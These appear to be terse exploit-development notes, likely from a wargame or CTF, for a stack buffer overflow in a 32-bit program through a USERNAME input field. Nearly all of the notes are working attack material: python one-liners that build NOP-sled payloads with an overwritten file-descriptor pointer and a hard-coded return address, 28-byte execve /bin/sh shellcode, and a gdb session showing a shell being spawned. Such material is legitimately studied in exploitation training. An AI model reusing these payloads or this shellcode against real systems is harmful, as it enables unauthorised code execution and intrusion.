- &FD = \x08\xb0\x04\x08 (0x804b008)
- controlling FD:
- !echo $(python -c 'print "USERNAME=" + "A" * 136 + "\x08\xb0\x04\x08"') > /tmp/lol
- !echo $(python -c 'print "USERNAME=" + "\x90" * 28 + "EIPP" + "\x90" * 76 + "\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80" + "\x08\xb0\x04\x08"') > /tmp/lol
- !echo $(python -c 'print "USERNAME=" + "zGMPOIMbhDCbwOZmzaNuIc1HKRKxzeSZbUpmZe14vDPC9M1eA6MW852OT7PYPxW3fhVfpFt0DYQQ6OSLlIgbBrKTl45yfTKYvoYUaxBh7bEZpcH1JNw4xGyKZ2V4ILPIIUy3jfbs" + "\x08\xb0\x04\x08" + "B" * 28 + "ZZZZ"') > /tmp/lol
- |
- |
- \
- \
- -> 0x5a53657a = zeSZ
- !echo $(python -c 'print "USERNAME=" + "\x90" * 28 + "EIPP" + "\x90" * 104 + "\x08\xb0\x04\x08" + "B" * 28 + "ZZZZ"') > /tmp/lol
- !echo $(python -c 'print "USERNAME=" + "\x90" * 28 + "\x24\xfb\xff\xbf" + "\x90" * 76 + "\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80" + "\x08\xb0\x04\x08" + "B" * 28 + "ZZZZ"') > /tmp/lol
- gdb$ unset env LINES
- gdb$ unset env COLUMNS
- gdb$ r /tmp/lol
- process 18692 is executing new program: /bin/bash
- sh-4.2$
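- 0xbffffb24 = \x24\xfb\xff\xbf (hard-coded stack address observed under gdb; presumably only valid with ASLR disabled and an executable stack, so ASLR and NX/DEP would break this return address)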
- shellcode \x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80
- shellcode above: execve /bin/sh, 28 bytes